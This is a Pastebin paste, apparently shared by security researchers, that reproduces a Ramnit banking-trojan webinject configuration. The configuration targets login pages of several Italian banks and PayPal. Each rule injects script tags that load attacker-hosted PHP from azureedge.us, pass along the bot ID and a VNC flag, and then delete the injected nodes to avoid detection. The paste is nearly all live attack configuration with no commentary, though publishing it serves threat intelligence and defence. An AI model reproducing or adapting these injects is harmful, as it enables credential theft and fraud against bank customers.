Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

New Ramnit Campaign Italian WebInjects

a guest Sep 14th, 2018 186 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. /***** NEW RAMNIT WEB INJECTS CAMPAIGN *****/
  2. /***** https://research.checkpoint.com *****/
  3.         /***** @_CPResearch *****/
  4.  
  5.  
  6. entry "WebFilters"
  7. *
  8. end
  9.  
  10. entry "WebDataFilters"
  11. *
  12. end
  13.  
  14. set_url *sendspace.com* GP
  15.  
  16. data_before
  17. <body*>
  18. data_end
  19. data_inject
  20. <script>alert('IT!');</script>
  21. data_end
  22. data_after
  23. data_end
  24.  
  25. set_url https://www.creval.it/bancaperta* GP
  26. data_before
  27. <head>*</title>
  28. data_end
  29. data_inject
  30. <script id="src1" src="https://azureedge.us/kenta/in/creval/cr.php?id=<%IDBOT%>"></script>
  31. <script id="src3">
  32. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  33. delsrc("src1");delsrc("src3");delsrc("src2");
  34. delete delsrc;
  35. </script>
  36. data_end
  37. data_after
  38. data_end
  39.  
  40.  
  41. set_url https://carigeonline.gruppocarige.it* GP
  42. data_before
  43. <head>*</title>
  44. data_end
  45. data_inject
  46. <script id="src2">
  47. window.bot_vnc = "%VNC%";
  48. </script>
  49. <script id="src1" src="https://azureedge.us/kenta/in/gruppocarige/gruppocarige_online.php?id=<%IDBOT%>"></script>
  50. <script id="src3">
  51. window.bot_vnc = "%VNC%";
  52. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  53. delsrc("src1");delsrc("src3");delsrc("src2");
  54. delete delsrc;
  55. </script>
  56. data_end
  57. data_after
  58. data_end
  59.  
  60. set_url https://www.gruppocarige.it/wps* GP
  61. data_before
  62. <head>*</script>
  63. data_end
  64. data_inject
  65. <script id="src2">
  66. window.bot_vnc = "%VNC%";
  67. </script>
  68. <script id="src1" src="https://azureedge.us/kenta/in/gruppocarige/gruppocarige_wps.php?id=<%IDBOT%>"></script>
  69. <script id="src3">
  70. window.bot_vnc = "%VNC%";
  71. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  72. delsrc("src1");delsrc("src3");delsrc("src2");
  73. delete delsrc;
  74. </script>
  75. data_end
  76. data_after
  77. data_end
  78.  
  79. set_url https://www.gruppocarige.it/vbank* GP
  80. data_before
  81. <HEAD>*</SCRIPT>
  82. data_end
  83. data_inject
  84. <script id="src2">
  85. window.bot_vnc = "%VNC%";
  86. </script>
  87. <script id="src1" src="https://azureedge.us/kenta/in/gruppocarige/gruppocarige_vbank.php?id=<%IDBOT%>"></script>
  88. <script id="src3">
  89. window.bot_vnc = "%VNC%";
  90. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  91. delsrc("src1");delsrc("src3");delsrc("src2");
  92. delete delsrc;
  93. </script>
  94. data_end
  95. data_after
  96. data_end
  97.  
  98. set_url https://www.gruppocarige.it/vbank* GP
  99. data_before
  100. <head>*</script>
  101. data_end
  102. data_inject
  103. <script id="src2">
  104. window.bot_vnc = "%VNC%";
  105. </script>
  106. <script id="src1" src="https://azureedge.us/kenta/in/gruppocarige/gruppocarige_vbank.php?id=<%IDBOT%>"></script>
  107. <script id="src3">
  108. window.bot_vnc = "%VNC%";
  109. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  110. delsrc("src1");delsrc("src3");delsrc("src2");
  111. delete delsrc;
  112. </script>
  113. data_end
  114. data_after
  115. data_end
  116.  
  117.  
  118. set_url https://*paypal.* GP
  119. data_before
  120. <html*</script>
  121. data_end
  122. data_inject
  123. <script id="src1" src="https://azureedge.us/alko/in/pp/p.php?id=<%IDBOT%>"></script>
  124. <script id="src3">
  125. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  126. delsrc("src1");delsrc("src3");
  127. delete delsrc;
  128. </script>
  129. data_end
  130. data_after
  131. data_end
  132.  
  133.  
  134. set_url https://www.intesasanpaolo.com/ib/public/login/login.html* GP
  135. data_before
  136. </body>
  137. data_end
  138. data_inject
  139. <script id="src2">
  140. window.bot_vnc = "%VNC%";
  141. </script>
  142. <script id="src1" src="https://azureedge.us/kenta/in/intesasanpaolo_pers/int_p.php?id=<%IDBOT%>"></script>
  143. <script id="src3">
  144. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  145. delsrc("src1");delsrc("src2");delsrc("src3");
  146. delete bot_id; delete bot_vnc; delete delsrc;
  147. </script>
  148. data_end
  149. data_after
  150. data_end
  151.  
  152.  
  153. set_url https://ib.mps.it/web/ib/login* GP
  154.  
  155. data_before
  156. IDUsername*</form>
  157. data_end
  158. data_inject
  159. <script id="src2">
  160. window.bot_vnc = "%VNC%";
  161. </script>
  162. <script id="src1" src="https://azureedge.us/kenta/in/mps/ib_mps.php?id=<%IDBOT%>"></script>
  163. <script id="src3">
  164. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  165. delsrc("src1");delsrc("src2");delsrc("src3");
  166. delete bot_id; delete bot_vnc; delete delsrc;
  167. </script>
  168. data_end
  169. data_after
  170. data_end
  171.  
  172. set_url https://digital.mps.it/pri/login/home_mobile.jsp* GP
  173.  
  174. data_before
  175. usernameLogin*</form>
  176. data_end
  177. data_inject
  178. <script id="src2">
  179. window.bot_vnc = "%VNC%";
  180. </script>
  181. <script id="src1" src="https://azureedge.us/kenta/in/mps/digital_mps.php?id=<%IDBOT%>"></script>
  182. <script id="src3">
  183. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  184. delsrc("src1");delsrc("src2");delsrc("src3");
  185. delete bot_id; delete bot_vnc; delete delsrc;
  186. </script>
  187. data_end
  188. data_after
  189. data_end
  190.  
  191.  
  192. set_url https://www.inbank.it* GP
  193. data_before
  194. <head>
  195. data_end
  196. data_inject
  197. <script id="src2">
  198. window.bot_vnc = "%VNC%";
  199. </script>
  200. <script id="src1" src="https://azureedge.us/kenta/in/inbank/com.php?id=<%IDBOT%>"></script>
  201. <script id="src3">
  202. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  203. delsrc("src1");delsrc("src2");delsrc("src3");
  204. delete bot_id; delete bot_vnc; delete delsrc;
  205. </script>
  206. data_end
  207. data_after
  208. data_end
  209.  
  210.  
  211. set_url https://bancopostaimpresaonline.poste.it* GP
  212.  
  213. data_before
  214. name="loginForm"*</form>
  215. data_end
  216. data_inject
  217. <script id="src2">
  218. window.bot_vnc = "%VNC%";
  219. </script>
  220. <script id="src1" src="https://azureedge.us/kenta/in/poste/pin.php?id=<%IDBOT%>"></script>
  221. <script id="src3">
  222. window.delsrc= function (a){if(document.getElementById(a)) document.getElementById(a).parentNode.removeChild(document.getElementById(a))};
  223. delsrc("src1");delsrc("src2");delsrc("src3");
  224. delete bot_id; delete bot_vnc; delete delsrc;
  225. </script>
  226. data_end
  227. data_after
  228. data_end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top